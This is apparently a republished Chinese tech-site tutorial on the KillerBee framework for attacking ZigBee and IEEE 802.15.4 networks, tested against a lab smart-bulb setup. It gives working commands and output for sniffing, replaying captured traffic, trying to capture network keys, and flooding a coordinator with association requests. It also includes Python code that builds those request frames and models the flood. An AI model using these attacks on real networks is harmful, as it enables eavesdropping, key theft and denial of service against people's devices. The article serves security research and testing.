2025-01-16 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/01 Report--
This article introduces the use of the KillerBee framework. Many people have questions about how to use KillerBee in daily work, so the editor consulted various materials and put together a simple, practical walkthrough that we hope answers them. Please follow along.
KillerBee framework
KillerBee is an attack framework and security research tool for ZigBee and IEEE 802.15.4 networks.
Framework requirements
KillerBee currently supports only Linux. The following Python modules must be installed before KillerBee itself. On Ubuntu the dependencies can be installed with the commands below. Note that these are the Python 2 package names used by the KillerBee release this article was written against; newer KillerBee releases have moved to Python 3, so check the project README for the dependency list that matches your version.
# apt-get install python-gtk2 python-cairo python-usb python-crypto python-serial python-dev libgcrypt-dev
# git clone https://github.com/secdev/scapy
# cd scapy
# python setup.py install
Note: KillerBee is a powerful but not "friendly" testing platform. It is aimed at developers and senior analysts, so it is recommended that you understand the ZigBee protocol before using it.
Install KillerBee
KillerBee uses the standard Python "setup.py" installer. Install it with:
# python setup.py install
Directory structure
The KillerBee source tree is laid out as follows:
doc/ - HTML documentation for the KillerBee library, generated by epydoc.
firmware/ - firmware for the supported KillerBee hardware devices.
killerbee/ - the Python library source code.
sample/ - sample packet captures, referenced below.
scripts/ - shell scripts used during development.
tools/ - ZigBee and IEEE 802.15.4 attack tools built on the framework.
Hardware requirements
KillerBee currently supports a variety of devices, including the River Loop ApiMote, Atmel RZ RAVEN transceivers, MoteIV Tmote Sky, TelosB motes, Sewio sniffers, and various hardware running the Silicon Labs Node Test firmware. The device used in this article is:
ApiMote v4 beta: the current beta firmware supports sniffing, injection, and jamming.
Tool introduction
KillerBee ships with a variety of tools, built on the framework, for attacking ZigBee and IEEE 802.15.4 networks. Each tool documents its options via the "-h" parameter; they are summarized below.
zbid - identifies the available interfaces that KillerBee and its tools can use.
zbwireshark - similar to zbdump, but exposes a named pipe for real-time capture and viewing in Wireshark.
zbdump - a tcpdump-like tool that captures IEEE 802.15.4 frames to a libpcap file. It can save packets in pcap and Daintree SNA formats.
zbreplay - performs a replay attack by reading frames from a specified Daintree DCF or libpcap capture file and retransmitting them. ACK frames are not retransmitted.
zbstumbler - active ZigBee and IEEE 802.15.4 network discovery tool. zbstumbler sends beacon request frames while channel hopping, recording and displaying summary information about the devices it discovers.
zbdsniff - captures ZigBee traffic and looks for NWK frames and over-the-air key provisioning. When a key is found, zbdsniff prints it to stdout.
zbkey - attempts to associate with the coordinator and then requests data from it in order to obtain the network key.
zbconvert - converts packet captures from libpcap to Daintree SNA format and vice versa.
zbfind - a GTK GUI application that tracks the location of an IEEE 802.15.4 transmitter by measuring RSSI.
zbscapy - provides an interactive Scapy shell for interaction through a KillerBee interface. Scapy must be installed to run it.
Framework introduction
KillerBee is primarily used to sniff packets, read and write packet capture files (libpcap or Daintree SNA), and inject arbitrary packets. Helper features, including IEEE 802.15.4, ZigBee NWK and ZigBee APS packet decoders, are also available.
The KillerBee API is documented in epydoc format, and the doc/ directory of the release contains the generated HTML. If epydoc is installed you can also generate a PDF for printing:
$ cd killerbee
$ mkdir pdf
$ epydoc --pdf -o pdf killerbee/
The pdf/ directory will then contain a file called "api.pdf" with the framework documentation.
Because KillerBee is a Python library, it integrates easily with other Python software. For example, the Sulley library is a fuzzing framework written in Python by Pedram Amini. KillerBee can be used together with Sulley for packet injection: Sulley generates malformed ZigBee data and KillerBee delivers it to the target.
ZigBee traffic analysis
ZigBee network environment
Build a smart light bulb system that communicates over ZigBee: four end devices (RGB lamps, numbered 1, 2, 3 and 4) and one ZigBee coordinator that the lamps join and communicate with.
Use ApiMote
In a Raspberry Pi environment, after installing the KillerBee framework as described above, we analyze and test the ZigBee traffic with the ApiMote hardware at hand.
Once the ApiMote is plugged into the Raspberry Pi it is detected automatically (USB ID 0403:6015, an FTDI bridge) and the driver is loaded:
root@raspberrypi:/home/pi/Desktop# lsusb
Bus 001 Device 005: ID 0403:6015 Future Technology Devices International, Ltd Bridge(I2C/SPI/UART/FIFO)
Bus 001 Device 003: ID 0424:ec00 Standard Microsystems Corp. SMSC9512/9514 Fast Ethernet Adapter
Bus 001 Device 002: ID 0424:9514 Standard Microsystems Corp. SMC9514 Hub
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
The ApiMote usually ships with firmware already installed and does not need to be reflashed. If you do need to flash it, the steps are as follows.
The firmware for the supported devices is in the firmware/ directory; for the ApiMote select apimotev4_202011.hex.
Run the flash_apimote.sh script. If the first attempt loses sync and times out, a second attempt is sometimes needed before it flashes correctly.
Verify the firmware and list the devices by running sudo zbid:
root@raspberrypi:/home/pi/Desktop# zbid
           Dev  Product String        Serial Number
  /dev/ttyUSB1  GoodFET Api-Mote v2
Sniffing packets
zbwireshark lets you sniff ZigBee traffic and view it in Wireshark in real time. The tool creates a named pipe from which Wireshark reads the frames and displays them as they arrive.
root@raspberrypi:/home/pi/Desktop# zbwireshark -f 15
zbwireshark: listening on '/dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
The -f parameter selects channel 15 (2425 MHz in the 2.4 GHz band).
You can also use zbdump to sniff and save packets in pcap or Daintree format. Here we save in pcap format so that Wireshark can open it for protocol analysis; run zbdump as below, again using -f to select the channel and -w to name the output file:
root@raspberrypi:/home/pi/Desktop# zbdump -f 15 -w test.pcap
zbdump: listening on '/dev/ttyUSB1', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
^C
54 packets captured
Open the capture in Wireshark
In the captured frames the source and destination are identified by a network ID (the PAN ID) and 16-bit short addresses, for example:
PAN ID: 0xd85b
Short address 0x0000 is normally the coordinator.
Short address 0x0c08 was assigned to one of the end devices when it joined the ZigBee network.
The extended address is the device's 64-bit hardware (IEEE) address: 00:12:4b:00:22:30:5e:4b
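The addressing fields described above, and the raw frames that zbkey prints in hex further down this article, can be decoded with a few lines of Python. The following is an added example, not code from this article or from the KillerBee project: it parses the IEEE 802.15.4 MAC header, the ZigBee NWK header and the NWK auxiliary security header, using as constructed input the first frame from the zbkey output (transcribed from its hex dump) and the 5-byte ACK that followed it, and includes the ACK filter that zbreplay applies before retransmitting a capture. Field layouts follow the IEEE 802.15.4 and ZigBee specifications; the encrypted NWK payload is left opaque.

```python
"""Decode raw IEEE 802.15.4 / ZigBee NWK frames as KillerBee hands them over.

Added example, not part of the KillerBee project. Parses the MAC header, the
ZigBee NWK header and the NWK auxiliary security header; the ciphertext that
follows is not touched.
"""
import struct

FRAME_TYPES = {0: "beacon", 1: "data", 2: "ack", 3: "command"}
NWK_TYPES = {0: "data", 1: "command"}
KEY_IDS = {0: "link", 1: "network", 2: "key-transport", 3: "key-load"}
ADDR_NONE, ADDR_SHORT, ADDR_EXT = 0, 2, 3

# Constructed input: the first frame zbkey prints in raw hex later in this
# article (54 bytes), and the ACK it printed afterwards (5 bytes).
ZBKEY_FRAME = bytes.fromhex(
    "61 88 ac 5b d8 c4 10 00 00 08 02 c4 10 00 00 1e"
    "81 28 49 b4 09 00 3a a9 da fe ff 27 71 84 00 ce"
    "8c 9f 39 98 2e 26 f8 2c d1 54 ca 0a d9 2d fb 6c"
    "06 82 e3 29 03 00"
)
ACK_FRAME = bytes.fromhex("02 00 af 45 e8")


def _addr(buf, off, mode):
    """Read one addressing field: 16-bit short or 64-bit extended, LSB first on air."""
    if mode == ADDR_SHORT:
        return struct.unpack_from("<H", buf, off)[0], off + 2
    if mode == ADDR_EXT:
        raw = buf[off:off + 8][::-1]
        return ":".join(f"{b:02x}" for b in raw), off + 8
    return None, off


def parse_mac(frame):
    """Parse the 802.15.4 MAC header. Returns (fields, offset of the MAC payload)."""
    fcf, seq = struct.unpack_from("<HB", frame, 0)
    dmode, smode = (fcf >> 10) & 3, (fcf >> 14) & 3
    mac = {
        "type": FRAME_TYPES[fcf & 0x7],
        "security": bool(fcf & 0x0008),
        "ack_request": bool(fcf & 0x0020),
        "pan_compression": bool(fcf & 0x0040),
        "seq": seq,
        "dst_pan": None, "dst": None, "src_pan": None, "src": None,
    }
    off = 3
    if dmode != ADDR_NONE:
        mac["dst_pan"] = struct.unpack_from("<H", frame, off)[0]
        mac["dst"], off = _addr(frame, off + 2, dmode)
    if smode != ADDR_NONE:
        if mac["pan_compression"]:
            mac["src_pan"] = mac["dst_pan"]     # source PAN omitted: same PAN as dst
        else:
            mac["src_pan"] = struct.unpack_from("<H", frame, off)[0]
            off += 2
        mac["src"], off = _addr(frame, off, smode)
    return mac, off


def parse_nwk(payload):
    """Parse the ZigBee NWK header and, when security is set, its aux security header."""
    fcf, dst, src, radius, seq = struct.unpack_from("<HHHBB", payload, 0)
    nwk = {
        "type": NWK_TYPES.get(fcf & 0x3, "reserved"),
        "version": (fcf >> 2) & 0xF,
        "security": bool(fcf & 0x0200),
        "dst": dst, "src": src, "radius": radius, "seq": seq,
    }
    off = 8
    if fcf & 0x0800:                          # destination IEEE address present
        nwk["dst_ieee"], off = _addr(payload, off, ADDR_EXT)
    if fcf & 0x1000:                          # source IEEE address present
        nwk["src_ieee"], off = _addr(payload, off, ADDR_EXT)
    if fcf & 0x0100:                          # multicast control byte
        off += 1
    if nwk["security"]:
        ctrl = payload[off]                   # security control byte
        nwk["key_id"] = KEY_IDS[(ctrl >> 3) & 3]
        nwk["frame_counter"] = struct.unpack_from("<I", payload, off + 1)[0]
        off += 5
        if ctrl & 0x20:                       # extended nonce: sender's IEEE address
            nwk["sender_ieee"], off = _addr(payload, off, ADDR_EXT)
        if nwk["key_id"] == "network":
            nwk["key_seq"] = payload[off]     # network key sequence number
            off += 1
    # encrypted NWK payload + MIC + whatever trailer the radio appended
    nwk["remaining"] = len(payload) - off
    return nwk


def decode(frame):
    """Decode a raw frame: MAC fields always, NWK fields for data frames only."""
    mac, off = parse_mac(frame)
    nwk = parse_nwk(frame[off:]) if mac["type"] == "data" else None
    return {"mac": mac, "nwk": nwk}


def replayable(frame):
    """The filter zbreplay applies: every frame except an ACK is retransmitted."""
    return parse_mac(frame)[0]["type"] != "ack"


if __name__ == "__main__":
    for raw in (ZBKEY_FRAME, ACK_FRAME):
        print(decode(raw), "replayable:", replayable(raw))
```

For the zbkey frame the decoder reports PAN ID 0xd85b, a data frame from the coordinator 0x0000 to short address 0x10c4, NWK security enabled with the network key and a 32-bit frame counter; that frame counter is the field a receiver checks to reject replayed frames.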
Replay ZigBee traffic
Capture the device's traffic, then replay it back to the device. Whether a replay has any effect depends on the target: ZigBee NWK security carries a frame counter precisely so that receivers can reject replayed frames, so replay mainly works against unsecured traffic or devices that do not enforce the counter.
zbdump, used above to save traffic to a capture file, is combined with the zbreplay tool, which retransmits the pcap file produced by zbdump through the ApiMote.
The -f parameter selects the channel, -w names the pcap file to write captured frames to, and -r names the pcap file to read frames from.
root@raspberrypi:/home/pi/Desktop# zbdump -f 15 -w operating.pcap
zbdump: listening on '/dev/ttyUSB0', channel 15, page 0 (2425.0 MHz), link-type DLT_IEEE802_15_4, capture size 127 bytes
^C
61 packets captured
root@raspberrypi:/home/pi/Desktop# zbreplay -f 15 -r operating.pcap
zbreplay: retransmitting frames from 'operating.pcap' on interface '/dev/ttyUSB0' with a delay of 1.0 seconds.
34 packets transmitted
Fewer frames go out than were captured because, as noted above, zbreplay skips ACK frames.
Sniffing for keys
The zbdsniff tool scans a pcap file captured from the ZigBee network for a key sent in plaintext and prints any key it finds. It can only recover keys that were transmitted in the clear, such as a network key delivered unencrypted to a joining device, so a capture that contains no such key transport yields nothing.
root@raspberrypi:/home/pi/Desktop# zbdsniff -f operating.pcap -k c028128de295be0708aebe9eed
Processing operating.pcap
[+] Processed 1 capture files.
But I got no output from this file; it may be that no usable key was found.
zbkey serves a purpose similar to zbdsniff, except that instead of scanning a pcap file it sends an association request to the coordinator and then a data request to retrieve the key. The -f parameter selects the channel, -s the delay between packets, -p the PAN ID, and -a the ZigBee extended (hardware) address to use. In this environment it did not succeed:
root@raspberrypi:/home/pi/Desktop# zbkey -f 15 -s 0.1 -p d85b -a 00124b0022305e4b
Sending association packet...
Sending data request packet...
Received frame.
Length of packet received in associate_handle: 54
0000: 61 88 ac 5b d8 c4 10 00 00 08 02 c4 10 00 00 1e
0010: 81 28 49 b4 09 00 3a a9 da fe ff 27 71 84 00 ce
0020: 8c 9f 39 98 2e 26 f8 2c d1 54 ca 0a d9 2d fb 6c
0030: 06 82 e3 29 03 00
Received frame
Length of packet received in associate_handle: 50
0000: 61 88 cd 5b d8 08 0c a2 c4 02 08 0c 00 00 1d
0010: 85 28 47 99 02 00 4b 5e 30 22 00 4b 12 00 00 b5
0020: a9 58 f8 e2 96 ed ab 4f 9b 50 76 b4 99 d2 99 1a
0030: 09 d1
Received frame
Length of packet received in associate_handle: 5
0000: 02 00 af 45 e8
Sorry We didn't hear a device respond with an association response. Do you have an active target within range?
The frames it heard are ordinary secured NWK data frames (MAC frame control 0x8861, NWK frame control 0x0208) exchanged with the coordinator 0x0000, followed by an ACK; none of them is an association response, hence the failure message.
Denial of service attack
The KillerBee framework provides the zbassocflood tool, which floods the target network with association requests. The PAN ID (-p), channel (-c) and delay between requests (-s) are required:
root@raspberrypi:/home/pi/Desktop# zbassocflood -p d85b -c 15 -s 0.1
zbassocflood: Transmitting and receiving on interface '/dev/ttyUSB0'.
^C
Sent 13 associate requests.
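What zbkey and zbassocflood put on the air are plain IEEE 802.15.4 MAC command frames. The following added example (not code from the KillerBee project; it builds the frames from the 802.15.4 command frame formats directly) constructs the association request and data request for the network above, with the PAN ID, coordinator address and lamp address taken from the zbkey run, computes the FCS that a radio appends, and builds and parses the association response that the coordinator would have answered with, which is what zbkey waited for in vain. The flood helper models zbassocflood as that same request repeated from a fresh random extended address each time; the capability byte 0x8E and the random addresses are this example's assumptions. Nothing here transmits.

```python
"""Build the 802.15.4 MAC command frames behind zbkey and zbassocflood.

Added example, not KillerBee code. Frame layouts follow the IEEE 802.15.4
association request (0x01), association response (0x02) and data request
(0x04) command formats; the FCS is the standard CRC-16/KERMIT.
"""
import os
import struct

CMD_ASSOC_REQ, CMD_ASSOC_RESP, CMD_DATA_REQ = 0x01, 0x02, 0x04
FT_COMMAND, ACK_REQUEST, PAN_COMPRESSION = 0x0003, 0x0020, 0x0040
ADDR_SHORT, ADDR_EXT = 2, 3
BROADCAST_PAN = 0xFFFF

# Network seen in the zbkey run above: PAN ID, coordinator, one lamp's IEEE address.
PAN_ID = 0xD85B
COORDINATOR = 0x0000
LAMP_IEEE = "00:12:4b:00:22:30:5e:4b"


def fcs(data):
    """IEEE 802.15.4 FCS: CRC-16, poly x^16+x^12+x^5+1, LSB first, init 0 (CRC-16/KERMIT)."""
    crc = 0
    for b in data:
        crc ^= b
        for _ in range(8):
            crc = (crc >> 1) ^ 0x8408 if crc & 1 else crc >> 1
    return crc


def with_fcs(body):
    return body + struct.pack("<H", fcs(body))


def ieee_bytes(text):
    """'00:12:4b:00:22:30:5e:4b' -> 8 bytes, least significant byte first (as on air)."""
    return bytes.fromhex(text.replace(":", ""))[::-1]


def assoc_request(ieee_src, seq, pan_id=PAN_ID, capability=0x8E):
    """Association request: dst short (coordinator), src extended, src PAN = 0xffff."""
    fcf = FT_COMMAND | ACK_REQUEST | (ADDR_SHORT << 10) | (ADDR_EXT << 14)
    hdr = struct.pack("<HBHHH", fcf, seq, pan_id, COORDINATOR, BROADCAST_PAN)
    return with_fcs(hdr + ieee_bytes(ieee_src) + bytes([CMD_ASSOC_REQ, capability]))


def data_request(ieee_src, seq, pan_id=PAN_ID):
    """Data request: polls the coordinator for the pending association response."""
    fcf = FT_COMMAND | ACK_REQUEST | PAN_COMPRESSION | (ADDR_SHORT << 10) | (ADDR_EXT << 14)
    hdr = struct.pack("<HBHH", fcf, seq, pan_id, COORDINATOR)
    return with_fcs(hdr + ieee_bytes(ieee_src) + bytes([CMD_DATA_REQ]))


def assoc_response(ieee_dst, ieee_src, seq, short_addr, status, pan_id=PAN_ID):
    """The coordinator's reply: both addresses extended, PAN compressed, status 0 = success."""
    fcf = FT_COMMAND | ACK_REQUEST | PAN_COMPRESSION | (ADDR_EXT << 10) | (ADDR_EXT << 14)
    hdr = struct.pack("<HBH", fcf, seq, pan_id) + ieee_bytes(ieee_dst) + ieee_bytes(ieee_src)
    return with_fcs(hdr + bytes([CMD_ASSOC_RESP]) + struct.pack("<HB", short_addr, status))


def _addr_len(fcf):
    """Bytes of addressing fields that follow the FCF and sequence number."""
    size = {0: 0, 1: 0, 2: 2, 3: 8}
    dmode, smode = (fcf >> 10) & 3, (fcf >> 14) & 3
    n = 2 + size[dmode] if dmode else 0
    if smode:
        n += (0 if fcf & PAN_COMPRESSION else 2) + size[smode]
    return n


def parse_assoc_response(frame):
    """Return (short_address, status) for a valid association response, else None."""
    if len(frame) < 5 or fcs(frame[:-2]) != struct.unpack("<H", frame[-2:])[0]:
        return None                          # truncated or corrupted
    fcf = struct.unpack_from("<H", frame, 0)[0]
    if fcf & 7 != FT_COMMAND:
        return None
    off = 3 + _addr_len(fcf)
    if off + 6 > len(frame) or frame[off] != CMD_ASSOC_RESP:
        return None
    short_addr, status = struct.unpack_from("<HB", frame, off + 1)
    return short_addr, status


def assoc_flood(count, pan_id=PAN_ID):
    """zbassocflood-style flood (assumed model): one association request per random
    extended address, so the coordinator's address table fills with bogus joiners."""
    frames = []
    for i in range(count):
        ieee = ":".join(f"{b:02x}" for b in os.urandom(8))
        frames.append(assoc_request(ieee, i & 0xFF, pan_id))
    return frames


if __name__ == "__main__":
    print("assoc req :", assoc_request(LAMP_IEEE, 1).hex())
    print("data req  :", data_request(LAMP_IEEE, 2).hex())
    resp = assoc_response(LAMP_IEEE, "84:71:27:ff:fe:da:a9:3a", 3, 0x0C08, 0)
    print("assoc resp:", resp.hex(), "->", parse_assoc_response(resp))
```

The same fcs() check run over the last two bytes of a captured frame tells you whether a receiver would have accepted it; the association response handing out short address 0x0c08 is exactly the join step that produced the address seen in the Wireshark capture.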
KillerBee's attack tools fall roughly into: device discovery (zbstumbler, zbopenear, zbfind), traffic sniffing (zbdump, zbwireshark), key recovery (zbdsniff, zbkey, zbgoodfind), traffic replay (zbscapy, zbreplay), and denial of service (zbscapy, zbassocflood).
This concludes the study of how to use the KillerBee framework. We hope it has answered your questions. Combining theory with practice is the best way to learn, so go and try it! If you want to keep learning, keep following the site; the editor will continue to bring you more practical articles.
© 2024 shulou.com SLNews company. All rights reserved.